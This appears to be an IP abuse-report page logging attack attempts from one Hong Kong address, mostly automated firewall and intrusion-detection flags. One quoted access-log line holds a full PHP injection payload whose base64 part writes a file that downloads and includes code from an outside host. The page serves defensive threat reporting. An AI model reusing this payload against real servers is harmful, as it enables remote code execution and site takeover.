This IP address has been reported a total of
27
times from
21 distinct
sources.
103.112.99.135 was first reported on
, and the most recent report was
.
Recent Reports:
We have received reports of abusive activity from this IP address within the last week. It is
potentially still actively engaged in abusive activities.
Reporter
IoA Timestamp (UTC)
Comment
Categories
Anonymous
Automatically blocked after 2 security events. Observed repeated web application attack probes. Sour ...
show moreAutomatically blocked after 2 security events. Observed repeated web application attack probes. Source: Cloudflare security controls.
show less
This IP was detected by CrowdSec triggering crowdsecurity/suricata-major-severity(ET EXPLOIT file_pu ...
show moreThis IP was detected by CrowdSec triggering crowdsecurity/suricata-major-severity(ET EXPLOIT file_put_contents php base64 encoded Remote Code Execution 3).
show less
Hacking
Web App Attack
Anonymous
103.112.99.135 - - [22/Jul/2026:14:32:15 +0800] "GET /?p=/&s=<?=/**/file_put_contents(\"runtime/arch ...
show more103.112.99.135 - - [22/Jul/2026:14:32:15 +0800] "GET /?p=/&s=<?=/**/file_put_contents(\"runtime/archive/cnm.php\",base64_decode(\"R2lmODk8P3BocApmaWxlX3B1dF9jb250ZW50cygiY2hpbmEudHh0IiwgZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cuaGxiZWlwLmNvbS91cGxvYWRzLy9vcmlnaW5hbC8vMjAyNjA3MTMvYS50eHQiKSk7CmluY2x1ZGUoImNoaW5hLnR4dCIpOwo/Pg==\"));?> HTTP/1.1" 301 536 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
...
show less
Attack attempt against Interwebbi servers; (WPNINJA) Ninja Firewall attack on www.interwebbi.com (Co ...
show moreAttack attempt against Interwebbi servers; (WPNINJA) Ninja Firewall attack on www.interwebbi.com (Code injection) 103.112.99.135 (HK/Hong Kong/-): 1 in the last 3600 secs (CF_ENABLE); IP: 103.112.99.135; Ports: *; Direction: 0; Trigger: LF_CUSTOMTRIGGER;
show less
Multiple intrusion attempts via http/https on known vulnerable url offsets. Attack automatically blo ...
show moreMultiple intrusion attempts via http/https on known vulnerable url offsets. Attack automatically blocked by SkyDancer Ai(web-X).
show less